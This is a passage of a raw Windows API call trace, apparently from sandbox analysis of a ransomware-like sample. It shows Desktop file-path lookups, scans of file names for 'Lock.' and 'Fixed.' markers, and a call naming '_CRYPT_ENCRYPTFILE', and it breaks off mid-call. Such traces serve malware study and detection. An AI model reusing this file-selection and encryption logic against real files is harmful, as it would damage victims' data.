[0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0148.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0148.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0148.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x54) returned 0x2e563a8 [0148.442] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/E-SkW-EYmoA5t.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\E-SkW-EYmoA5t.bmp", lpFilePart=0x8cf650*="E-SkW-EYmoA5t.bmp") returned 0x29 [0148.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0148.442] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\E-SkW-EYmoA5t.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\e-skw-eymoa5t.bmp")) returned 0xffffffff [0148.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0148.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0148.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0148.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0148.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0148.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0148.444] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0148.444] TranslateMessage (lpMsg=0x8cf968) returned 0 [0148.444] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0148.444] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0148.444] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0148.445] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0148.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0148.445] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0148.445] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0148.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0148.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0148.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0148.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0148.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ElwQwY9lqgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lwQwY9lqgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wQwY9lqgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QwY9lqgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wY9lqgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y9lqgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9lqgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lqgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qgU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gU4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Me-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0148.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0148.446] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0148.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0148.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0148.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0148.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0148.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0148.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0148.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0148.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0148.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0148.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0148.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ElwQwY9lqgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lwQwY9lqgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wQwY9lqgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QwY9lqgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wY9lqgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y9lqgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9lqgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lqgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qgU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gU4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Me-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0148.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5E.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0148.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0148.448] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0148.448] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0148.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b38 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0148.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0148.449] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0148.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0148.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0148.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0148.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0148.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0148.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0148.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0148.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0148.449] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0148.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0148.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0148.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0148.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0148.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0148.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0148.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0148.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0148.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0148.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0148.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0148.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0148.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0148.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0148.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0148.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53830 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0148.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0148.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0148.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0148.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0148.453] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0148.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0148.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0148.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0148.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0148.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0148.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0148.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0148.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0148.454] PeekMessageW (in: 